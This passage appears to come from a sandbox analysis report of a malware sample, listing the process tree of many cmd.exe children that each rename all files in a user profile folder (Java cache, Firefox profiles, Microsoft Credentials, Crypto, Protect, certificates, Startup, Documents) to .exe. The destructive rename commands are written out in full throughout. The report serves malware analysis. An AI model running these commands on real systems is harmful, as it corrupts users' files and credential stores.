  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35\*.*" "*.exe"
  2⤵
  PID:872
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\36\*.*" "*.exe"
  2⤵
  PID:2416
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\37\*.*" "*.exe"
  2⤵
  PID:1556
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\38\*.*" "*.exe"
  2⤵
  PID:1052
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\39\*.*" "*.exe"
  2⤵
  PID:964
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\4\*.*" "*.exe"
  2⤵
  PID:2112
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\40\*.*" "*.exe"
  2⤵
  PID:2072
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\41\*.*" "*.exe"
  2⤵
  PID:1680
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\42\*.*" "*.exe"
  2⤵
  PID:944
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43\*.*" "*.exe"
  2⤵
  PID:2032
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\44\*.*" "*.exe"
  2⤵
  PID:880
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\45\*.*" "*.exe"
  2⤵
  PID:2292
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\46\*.*" "*.exe"
  2⤵
  PID:2548
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\47\*.*" "*.exe"
  2⤵
  PID:2576
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\48\*.*" "*.exe"
  2⤵
  PID:1104
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\49\*.*" "*.exe"
  2⤵
  PID:2204
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\5\*.*" "*.exe"
  2⤵
  PID:1980
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\50\*.*" "*.exe"
  2⤵
  PID:652
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\51\*.*" "*.exe"
  2⤵
  PID:1520
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\52\*.*" "*.exe"
  2⤵
  PID:2800
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\53\*.*" "*.exe"
  2⤵
  PID:1612
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\54\*.*" "*.exe"
  2⤵
  PID:2652
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\55\*.*" "*.exe"
  2⤵
  PID:2724
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\56\*.*" "*.exe"
  2⤵
  PID:2896
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\57\*.*" "*.exe"
  2⤵
  PID:2888
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\58\*.*" "*.exe"
  2⤵
  PID:2820
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\59\*.*" "*.exe"
  2⤵
  PID:2620
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\6\*.*" "*.exe"
  2⤵
  PID:2628
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\60\*.*" "*.exe"
  2⤵
  PID:2688
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\61\*.*" "*.exe"
  2⤵
  PID:2828
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\62\*.*" "*.exe"
  2⤵
  PID:2792
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\63\*.*" "*.exe"
  2⤵
  PID:1164
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7\*.*" "*.exe"
  2⤵
  PID:1992
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\8\*.*" "*.exe"
  2⤵
  PID:1796
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\9\*.*" "*.exe"
  2⤵
  PID:1988
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\host\*.*" "*.exe"
  2⤵
  PID:1716
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\muffin\*.*" "*.exe"
  2⤵
  PID:2348
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Adobe\*.*" "*.exe"
  2⤵
  PID:2876
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Identities\*.*" "*.exe"
  2⤵
  PID:2056
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Macromedia\*.*" "*.exe"
  2⤵
  PID:1692
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Media Center Programs\*.*" "*.exe"
  2⤵
  PID:640
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\*.*" "*.exe"
  2⤵
  PID:2328
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\*.*" "*.exe"
  2⤵
  PID:2092
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\*.*" "*.exe"
  2⤵
  PID:2080
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\*.*" "*.exe"
  2⤵
  PID:592
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\*.*" "*.exe"
  2⤵
  PID:2288
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\Collab\*.*" "*.exe"
  2⤵
  PID:596
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\AssetCache\*.*" "*.exe"
  2⤵
  PID:2276
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\NativeCache\*.*" "*.exe"
  2⤵
  PID:600
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\AssetCache\44URQ43K\*.*" "*.exe"
  2⤵
  PID:920
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Identities\{12BBF4E7-85A6-4BA8-A5EE-FE066C096AAA}\*.*" "*.exe"
  2⤵
  PID:1408
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\*.*" "*.exe"
  2⤵
  PID:2416
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\*.*" "*.exe"
  2⤵
  PID:1144
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\*.*" "*.exe"
  2⤵
  PID:1512
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\SMJEMA44\*.*" "*.exe"
  2⤵
  PID:1428
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\*.*" "*.exe"
  2⤵
  PID:2120
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\*.*" "*.exe"
  2⤵
  PID:1676
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\*.*" "*.exe"
  2⤵
  PID:1020
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Credentials\*.*" "*.exe"
  2⤵
  PID:2340
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\*.*" "*.exe"
  2⤵
  PID:2504
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\*.*" "*.exe"
  2⤵
  PID:1552
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\*.*" "*.exe"
  2⤵
  PID:1560
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\*.*" "*.exe"
  2⤵
  PID:2016
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\*.*" "*.exe"
  2⤵
  PID:2148
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\*.*" "*.exe"
  2⤵
  PID:1732
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3601492379-692465709-652514833-1000\*.*" "*.exe"
  2⤵
  PID:848
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\*.*" "*.exe"
  2⤵
  PID:1616
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData\*.*" "*.exe"
  2⤵
  PID:2800
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\*.*" "*.exe"
  2⤵
  PID:2656
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\*.*" "*.exe"
  2⤵
  PID:2200
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\*.*" "*.exe"
  2⤵
  PID:2836
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\*.*" "*.exe"
  2⤵
  PID:2820
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-3601492379-692465709-652514833-1000\*.*" "*.exe"
  2⤵
  PID:1736
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\*.*" "*.exe"
  2⤵
  PID:2688
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\*.*" "*.exe"
  2⤵
  PID:2672
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\*.*" "*.exe"
  2⤵
  PID:2508
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\*.*" "*.exe"
  2⤵
  PID:1968
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\*.*" "*.exe"
  2⤵
  PID:2912
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException\*.*" "*.exe"
  2⤵
  PID:824
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache\*.*" "*.exe"
  2⤵
  PID:768
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache\*.*" "*.exe"
  2⤵
  PID:1644
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IEDownloadHistory\*.*" "*.exe"
  2⤵
  PID:1692
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache\*.*" "*.exe"
  2⤵
  PID:2996
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\*.*" "*.exe"
  2⤵
  PID:604
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\*.*" "*.exe"
  2⤵
  PID:2112
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\*.*" "*.exe"
  2⤵
  PID:336
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\*.*" "*.exe"
  2⤵
  PID:2008
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\sessionstore-backups\*.*" "*.exe"
  2⤵
  PID:2796
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\security_state\*.*" "*.exe"
  2⤵
  PID:2328
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\minidumps\*.*" "*.exe"
  2⤵
  PID:1692
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\datareporting\*.*" "*.exe"
  2⤵
  PID:1648
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\crashes\*.*" "*.exe"
  2⤵
  PID:2564
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\bookmarkbackups\*.*" "*.exe"
  2⤵
  PID:1716
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\*.*" "*.exe"
  2⤵
  PID:3064
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.Admin\*.*" "*.exe"
  2⤵
  PID:2472
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\*.*" "*.exe"
  2⤵
  PID:1320
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\*.*" "*.exe"
  2⤵
  PID:1736
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Pending Pings\*.*" "*.exe"
  2⤵
  PID:2624
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\*.*" "*.exe"
  2⤵
  PID:2184
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\*.*" "*.exe"
  2⤵
  PID:2932
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\storage\*.*" "*.exe"
  2⤵
  PID:604
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Extensions\*.*" "*.exe"
  2⤵
  PID:3044
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\*.*" "*.exe"
  2⤵
  PID:2888
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\*.*" "*.exe"
  2⤵
  PID:2396
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*" "*.exe"
  2⤵
  PID:2100
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\*.*" "*.exe"
  2⤵
  PID:2872
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\*.*" "*.exe"
  2⤵
  PID:1612
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\*.*" "*.exe"
  2⤵
  PID:1728
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\*.*" "*.exe"
  2⤵
  PID:2248
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\*.*" "*.exe"
  2⤵
  PID:900
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE\Low\*.*" "*.exe"
  2⤵
  PID:2360
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IETldCache\Low\*.*" "*.exe"
  2⤵
  PID:1764
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low\*.*" "*.exe"
  2⤵
  PID:2432
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\IECompatCache\Low\*.*" "*.exe"
  2⤵
  PID:884
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException\Low\*.*" "*.exe"
  2⤵
  PID:2368
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\*.*" "*.exe"
  2⤵
  PID:1568
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\*.*" "*.exe"
  2⤵
  PID:1212
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\*.*" "*.exe"
  2⤵
  PID:1820
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\*.*" "*.exe"
  2⤵
  PID:2476
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\PrivacIE\*.*" "*.exe"
  2⤵
  PID:2440
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\*.*" "*.exe"
  2⤵
  PID:2288
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\*.*" "*.exe"
  2⤵
  PID:1656
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\crashes\events\*.*" "*.exe"
  2⤵
  PID:3004
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\datareporting\glean\*.*" "*.exe"
  2⤵
  PID:2380
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\datareporting\glean\db\*.*" "*.exe"
  2⤵
  PID:1100
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\datareporting\glean\events\*.*" "*.exe"
  2⤵
  PID:1672
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\datareporting\glean\pending_pings\*.*" "*.exe"
  2⤵
  PID:2284
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\datareporting\glean\tmp\*.*" "*.exe"
  2⤵
  PID:1372
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\storage\permanent\*.*" "*.exe"
  2⤵
  PID:1212
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\storage\permanent\chrome\*.*" "*.exe"
  2⤵
  PID:1008
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\storage\permanent\chrome\idb\*.*" "*.exe"
  2⤵
  PID:1328
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\*.*" "*.exe"
  2⤵
  PID:1508
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\*.*" "*.exe"
  2⤵
  PID:1044
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\*.*" "*.exe"
  2⤵
  PID:884
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\*.*" "*.exe"
  2⤵
  PID:2032
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\*.*" "*.exe"
  2⤵
  PID:300
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\*.*" "*.exe"
  2⤵
  PID:2512
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Documents\My Music\*.*" "*.exe"
  2⤵
  PID:2436
- C:\Windows\System32\cmd.exe
